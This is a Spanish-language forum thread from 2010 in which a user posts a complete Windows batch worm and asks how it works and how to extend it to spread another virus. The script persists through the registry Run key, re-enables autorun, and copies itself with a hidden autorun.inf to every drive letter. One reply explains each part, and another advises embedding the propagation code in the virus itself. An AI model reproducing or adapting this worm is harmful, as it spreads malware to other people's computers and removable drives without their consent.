Duda con propagacion por usb

Iniciado por SockMon, 5 Septiembre 2010, 19:20 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

SockMon

5 Septiembre 2010, 19:20 PM
Bueno buscando por internet encontre este batch de DracoX pero me surgen varias dudas.
Código (bash) [Seleccionar]
@echo off
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USB-Auto /d %windir%\USB-Auto\USB.bat /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom /v AutoRun /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v allocatecdroms /d 0 /f
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveTypeAutoRun /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDriveAutoRun /f

if exist %windir%\USB-Auto\ Del /f /s /q %windir%\USB-Auto\
md %windir%\USB-Auto\
pushd %windir%\USB-Auto\
copy %0 USB.bat

echo [autorun]>>autorun.inf
echo open=USB.bat>>autorun.inf
echo icon=icon.ico>>autorun.inf
echo label=Infected>>autorun.inf

for %%x in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do copy /Y autorun.inf %%x:\autorun.inf && copy %0 %%x:\USB.bat && copy /Y %0 %%x:\icon.ico && attrib +R +S +H %%x:\icon.ico && attrib +R +S +H %%x:\USB.bat && attrib +R +S +H %%x:\autorun.inf

Esto lo unico que haria seria copiarse a si mismo guardarse en el pc y copiarse automaticamente en cualquier usb que se conecte no?

Por que realiza algunas acciones con el registro?

Como lo tendria que modificar para que tambien propagara un virus ejemplo mibixo.exe?

Por ultimo hace falta crearle un autorun para que se ejecute cuando se abra la unidad?

Gracias

leogtz

#1
5 Septiembre 2010, 19:29 PM
Lo primero es, ¿para qué haces esto?

Y el código agrega (reg add) un archivo bat al inicio de Windows, para que siempre se ejecute.

Habilita el autorun.

Borra algunas claves del registro que tienen que ver con el Autorun.

Código [Seleccionar]
if exist %windir%\USB-Auto\ Del /f /s /q %windir%\USB-Auto\
md %windir%\USB-Auto\
pushd %windir%\USB-Auto\
copy %0 USB.bat

Copia el bat a la carpeta de Windows.

Código [Seleccionar]
echo [autorun]>>autorun.inf
echo open=USB.bat>>autorun.inf
echo icon=icon.ico>>autorun.inf
echo label=Infected>>autorun.inf

Crea el autorun.

Código [Seleccionar]
[code]for %%x in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do copy /Y autorun.inf %%x:\autorun.inf && copy %0 %%x:\USB.bat && copy /Y %0 %%x:\icon.ico && attrib +R +S +H %%x:\icon.ico && attrib +R +S +H %%x:\USB.bat && attrib +R +S +H %%x:\autorun.inf[/code]

Propagación.

Necesitas estudiar un poco más para saber qué hace este código.
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

[L]ord [R]NA

#2
5 Septiembre 2010, 19:29 PM
1) Si eso es lo que hace, funciona en versiones de XP o inferior, debido a la UAC.
2) Se añade al registro y borra algunas cosas para habilitar el autorun.
3) Agregalo dentro del codigo de tu bixo, es mas estetico que tener que usar un batch.
4) Si, aunque hay otros metodos.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario